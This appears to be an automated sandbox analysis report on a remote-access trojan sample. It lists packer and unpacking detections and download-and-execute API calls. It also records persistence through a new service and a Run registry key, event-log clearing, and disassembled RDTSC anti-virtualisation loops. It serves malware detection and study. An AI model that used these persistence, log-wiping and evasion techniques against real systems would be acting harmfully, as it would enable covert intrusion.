                Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2160765089.0000000002264000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912424952.00000000026AB000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2609394899.00000000024F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2701196874.0000000002213000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946604927.00000000023E0000.00000040.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912424952.00000000026AB000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2609394899.00000000024F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2701196874.0000000002213000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946604927.00000000023E0000.00000040.00000020.00020000.00000000.sdmp
                Source: Binary string: wuser32.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002A5C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2720432186.00000000024F2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912752894.0000000002860000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947054584.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2799524772.0000000002597000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: \Server\Release\Xy.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.000000000041F000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: wkernelbase.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913041831.0000000002A8D000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946883460.00000000027B9000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2223717486.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520956038.00000000022EC000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2909171827.00000000023C2000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2686941457.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946450413.000000000233F000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2762218547.0000000002218000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.0000000002600000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.0000000002590000.00000040.00000800.00020000.00000000.sdmp
                Source: Binary string: wuser32.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002A5C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2720432186.00000000024F2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912752894.0000000002860000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947054584.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2799524772.0000000002597000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeUnpacked PE file: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.400000.0.unpack .text:EW;.sedata:EW;.idata:W;.rsrc:W;.sedata:R; vs .text:ER;.sedata:ER;.idata:R;.rsrc:R;.sedata:R;
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeUnpacked PE file: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.400000.0.unpack .text:EW;.sedata:EW;.idata:W;.rsrc:W;.sedata:R; vs .text:ER;.sedata:ER;.idata:R;.rsrc:R;.sedata:R;
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeUnpacked PE file: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.400000.0.unpack .text:EW;.sedata:EW;.idata:W;.rsrc:W;.sedata:R; vs .text:ER;.sedata:ER;.idata:R;.rsrc:R;.sedata:R;
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0040FB6E LoadLibraryW,GetProcAddress,FreeLibrary,0_2_0040FB6E
                Source: initial sampleStatic PE information: section where entry point is pointing to: .sedata
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeStatic PE information: section name: .sedata
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeStatic PE information: section name: .sedata
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048B85F push dword ptr [esp+28h]; retn 002Ch0_2_0048B88D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0041801A push cs; iretd 0_2_004180CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_004180D1 push cs; iretd 0_2_004180CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048B899 push dword ptr [esp+28h]; retn 002Ch0_2_0048B88D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00495143 pushfd ; mov dword ptr [esp], edx0_2_0049514E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048B97E push dword ptr [esp+04h]; retn 0008h0_2_0048B9CF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048B92B push dword ptr [esp+04h]; retn 0008h0_2_0048B9CF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00485123 push dword ptr [esp+04h]; retn 0008h0_2_00485150
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048B990 push dword ptr [esp+04h]; retn 0008h0_2_0048B9CF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048B995 push dword ptr [esp+04h]; retn 0008h0_2_0048B9CF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048BAF0 push dword ptr [esp+08h]; retn 000Ch0_2_0048BBD1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00529375 push dword ptr [esp]; mov dword ptr [esp], esi0_2_00529378
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00485B76 push dword ptr [esp+04h]; retn 0008h0_2_00485C1D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048BBD8 push dword ptr [esp+08h]; retn 000Ch0_2_0048BBD1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00405BE0 push eax; ret 0_2_00405C0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048BBBB push dword ptr [esp+08h]; retn 000Ch0_2_0048BBD1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048C43D push dword ptr [esp+04h]; retn 0008h0_2_0048C6C3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00417CDF push esi; ret 0_2_00417CED
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00485CE0 push dword ptr [esp+40h]; retn 0044h0_2_00485D1B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00412E6C push eax; ret 0_2_00412E9A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00412E28 push eax; ret 0_2_00412E46
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048C6D9 push dword ptr [esp+04h]; retn 0008h0_2_0048C6C3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_1000ADDC push eax; ret 0_2_1000ADFA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_1000AE20 push eax; ret 0_2_1000AE4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0244D7F6 pushad ; ret 0_2_0244DD90
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0048B85F push dword ptr [esp+28h]; retn 002Ch4_2_0048B88D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0041801A push cs; iretd 4_2_004180CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_004180D1 push cs; iretd 4_2_004180CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0048B899 push dword ptr [esp+28h]; retn 002Ch4_2_0048B88D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_00495143 pushfd ; mov dword ptr [esp], edx4_2_0049514E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0048B97E push dword ptr [esp+04h]; retn 0008h4_2_0048B9CF
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeStatic PE information: section name: .text entropy: 7.927037404813812
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeStatic PE information: section name: .sedata entropy: 7.819402663359735
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0041200B URLDownloadToFileA,ShellExecuteA,0_2_0041200B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Rsjshd fzfgkqcmJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00411ACF GetModuleFileNameA,ExpandEnvironmentStringsA,strlen,strncmp,wsprintfA,strlen,strlen,_mbscat,_mbscat,CopyFileA,memset,_mbscpy,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,_mbscpy,_mbscat,RegOpenKeyA,lstrlen,RegSetValueExA,0_2_00411ACF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dhttdfv.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dhttdfv.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0040D2C9 OpenEventLogA,ClearEventLogA,CloseEventLog,0_2_0040D2C9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI/Special instruction interceptor: Address: 52D156
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI/Special instruction interceptor: Address: 52D1B0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI/Special instruction interceptor: Address: 52D48E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI/Special instruction interceptor: Address: 52D476
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI/Special instruction interceptor: Address: 52D543
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI/Special instruction interceptor: Address: 52D798
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI/Special instruction interceptor: Address: 52D551
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI/Special instruction interceptor: Address: 52D667
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI/Special instruction interceptor: Address: 52D64F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI/Special instruction interceptor: Address: 52E69B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI/Special instruction interceptor: Address: 52A499
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D0C3 second address: 52D156 instructions: 0x00000000 rdtsc 0x00000002 lea eax, dword ptr [ebp+1Eh] 0x00000005 bsf bp, sp 0x00000009 pop dx 0x0000000b jmp 00007F8AB1593E77h 0x0000000d mov edi, 6144D9A9h 0x00000012 mov word ptr [esp+01h], bx 0x00000017 add esp, 01h 0x0000001a jmp 00007F8AB1593EBEh 0x0000001c lea ecx, dword ptr [ecx+3F6DD35Ch] 0x00000022 lea esi, dword ptr [esp+0000F508h] 0x00000029 mov byte ptr [esp], dl 0x0000002c mov eax, dword ptr [esp] 0x0000002f not cl 0x00000031 mov ebp, dword ptr [esp] 0x00000034 jmp 00007F8AB1593F3Bh 0x00000039 xchg ebp, esi 0x0000003b mov byte ptr [esp+01h], cl 0x0000003f mov dx, word ptr [esp] 0x00000043 mov dh, 38h 0x00000045 mov di, word ptr [esp] 0x00000049 sub esp, 14h 0x0000004c jmp 00007F8AB1593E40h 0x0000004e xchg bp, dx 0x00000051 pop word ptr [esp+12h] 0x00000056 push word ptr [esp+03h] 0x0000005b pop edi 0x0000005c cmc 0x0000005d mov si, dx 0x00000060 jmp 00007F8AB1593E6Eh 0x00000062 cmc 0x00000063 push dword ptr [esp+03h] 0x00000067 cld 0x00000068 add esp, 06h 0x0000006b neg dh 0x0000006d pop eax 0x0000006e jmp 00007F8AB1593EDEh 0x00000070 sub esp, 11h 0x00000073 mov word ptr [esp+18h], bp 0x00000078 pop dword ptr [esp+13h] 0x0000007c cpuid 0x0000007e push dword ptr [esp+19h] 0x00000082 cpuid 0x00000084 jmp 00007F8AB1593E76h 0x00000086 dec cx 0x00000088 xchg bp, di 0x0000008b or dh, FFFFFFF5h 0x0000008e pop cx 0x00000090 pop cx 0x00000092 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D156 second address: 52D1B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEEAE8h 0x00000007 clc 0x00000008 rcl di, cl 0x0000000b bts ax, di 0x0000000f shl al, 00000000h 0x00000012 lea edx, dword ptr [00000000h+eax*4] 0x00000019 bswap esi 0x0000001b jmp 00007F8AB0DEE834h 0x00000020 mov ebx, BC6819FEh 0x00000025 mov ebp, dword ptr [esp+15h] 0x00000029 mov cl, ah 0x0000002b btr ax, di 0x0000002f xchg dword ptr [esp+12h], edi 0x00000033 add ah, cl 0x00000035 jmp 00007F8AB0DEE901h 0x00000037 not ah 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D486 second address: 52D48E instructions: 0x00000000 rdtsc 0x00000002 bswap ebx 0x00000004 lea esp, dword ptr [esp+0Ah] 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D48E second address: 52D476 instructions: 0x00000000 rdtsc 0x00000002 mov ah, byte ptr [esp] 0x00000005 mov dh, byte ptr [esp] 0x00000008 jmp 00007F8AB0DEE92Ah 0x0000000a mov al, byte ptr [esp] 0x0000000d lea esp, dword ptr [esp] 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D476 second address: 52D543 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 not edx 0x00000006 std 0x00000007 jmp 00007F8AB15945E0h 0x0000000c mov byte ptr [esp], bl 0x0000000f neg al 0x00000011 pushad 0x00000012 mov ebx, esi 0x00000014 xchg bp, bx 0x00000017 mov al, 3Bh 0x00000019 jmp 00007F8AB1593813h 0x0000001e stc 0x0000001f pop edi 0x00000020 xchg dword ptr [esp+07h], ebp 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D543 second address: 52D798 instructions: 0x00000000 rdtsc 0x00000002 bt edx, ecx 0x00000005 sub esp, 10h 0x00000008 jmp 00007F8AB0DEE8E3h 0x0000000a xchg word ptr [esp+26h], si 0x0000000f lea ebx, dword ptr [00000000h+esi*4] 0x00000016 setnl dh 0x00000019 mov word ptr [esp+29h], cx 0x0000001e lea ecx, dword ptr [00000000h+eax*4] 0x00000025 lea eax, dword ptr [esp-000000ECh] 0x0000002c jmp 00007F8AB0DEE902h 0x0000002e lea edi, dword ptr [esi+ebp] 0x00000031 std 0x00000032 xchg word ptr [esp+01h], bx 0x00000037 cld 0x00000038 mov ecx, ebp 0x0000003a mov dx, bp 0x0000003d jmp 00007F8AB0DEE956h 0x0000003f xchg dword ptr [esp+03h], esi 0x00000043 mov byte ptr [esp+19h], dl 0x00000047 call 00007F8AB0DEE999h 0x0000004c xchg cx, bx 0x0000004f popad 0x00000050 push word ptr [esp+08h] 0x00000055 pop ebx 0x00000056 jmp 00007F8AB0DEE930h 0x00000058 cpuid 0x0000005a pop dx 0x0000005c sub esp, 00000000h 0x0000005f xchg dword ptr [esp+06h], eax 0x00000063 sbb bx, 6906h 0x00000068 jmp 00007F8AB0DEE962h 0x0000006a mov di, word ptr [esp+07h] 0x0000006f call 00007F8AB0DEEC7Eh 0x00000074 mov di, word ptr [esp+01h] 0x00000079 lea edx, dword ptr [ebp+00002BDCh] 0x0000007f pushfd 0x00000080 mov di, ax 0x00000083 pop word ptr [esp+0Fh] 0x00000088 jmp 00007F8AB0DEE86Eh 0x0000008d bsf bp, sp 0x00000091 xchg word ptr [esp+0Eh], bp 0x00000096 pop bp 0x00000098 mov ch, 02h 0x0000009a mov ch, dl 0x0000009c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D798 second address: 52D551 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593CAEh 0x00000007 xchg dh, al 0x00000009 mov bx, cx 0x0000000c lea esi, dword ptr [ebx-7Fh] 0x0000000f pop si 0x00000011 mov ax, 8CB8h 0x00000015 lea edi, dword ptr [esp+0000A102h] 0x0000001c jmp 00007F8AB1593E4Eh 0x0000001e rcr dl, 00000007h 0x00000021 xchg bp, cx 0x00000024 btc bp, di 0x00000028 lea ebx, dword ptr [edi+000012C5h] 0x0000002e pop bp 0x00000030 bsr bp, cx 0x00000034 jmp 00007F8AB1593E6Ch 0x00000036 mov dx, D781h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D551 second address: 52D6C5 instructions: 0x00000000 rdtsc 0x00000002 std 0x00000003 mov ch, byte ptr [esp+0Ah] 0x00000007 mov al, byte ptr [esp+05h] 0x0000000b mov byte ptr [esp+06h], dl 0x0000000f jmp 00007F8AB0DEE973h 0x00000011 pop edx 0x00000012 pop word ptr [esp+01h] 0x00000017 call 00007F8AB0DEE956h 0x0000001c mov eax, ebp 0x0000001e mov bh, AAh 0x00000020 mov bl, ah 0x00000022 add esp, 03h 0x00000025 jmp 00007F8AB0DEE98Dh 0x00000027 mov edi, dword ptr [esp+01h] 0x0000002b not ax 0x0000002e pop edi 0x0000002f mov edi, ebp 0x00000031 ror al, cl 0x00000033 bt edx, ebp 0x00000036 jmp 00007F8AB0DEE92Bh 0x00000038 push word ptr [esp+03h] 0x0000003d cld 0x0000003e dec dl 0x00000040 mov ah, bl 0x00000042 pop word ptr [esp+01h] 0x00000047 jmp 00007F8AB0DEEA47h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D6C5 second address: 52D667 instructions: 0x00000000 rdtsc 0x00000002 xchg bp, ax 0x00000005 lea esi, dword ptr [eax-000000E4h] 0x0000000b pop word ptr [esp] 0x0000000f clc 0x00000010 mov bp, sp 0x00000013 jmp 00007F8AB1593DF8h 0x00000018 push word ptr [esp] 0x0000001c mov eax, dword ptr [esp+02h] 0x00000020 mov byte ptr [esp+02h], cl 0x00000024 setp bh 0x00000027 xchg ebp, eax 0x00000029 xchg eax, ebx 0x0000002a jmp 00007F8AB1593E5Ah 0x0000002c xchg dh, ah 0x0000002e sub esp, 1Eh 0x00000031 mov byte ptr [esp+12h], cl 0x00000035 xchg byte ptr [esp+1Eh], cl 0x00000039 not bh 0x0000003b mov byte ptr [esp+0Ah], bl 0x0000003f jmp 00007F8AB1593E77h 0x00000041 lea eax, dword ptr [66EDA811h] 0x00000047 lea edi, dword ptr [00000000h+ebx*4] 0x0000004e popad 0x0000004f stc 0x00000050 jmp 00007F8AB1593EBCh 0x00000052 mov ecx, dword ptr [esp] 0x00000055 push cx 0x00000057 xchg bx, cx 0x0000005a add esp, 02h 0x0000005d mov word ptr [esp], di 0x00000061 std 0x00000062 jmp 00007F8AB1593ED9h 0x00000064 bsr bp, ax 0x00000068 clc 0x00000069 setbe bh 0x0000006c sub esp, 1Fh 0x0000006f mov ah, dl 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52D667 second address: 52D64F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE92Bh 0x00000004 lea edi, dword ptr [esi-0000E5A0h] 0x0000000a cmc 0x0000000b not bh 0x0000000d cpuid 0x0000000f rdtsc
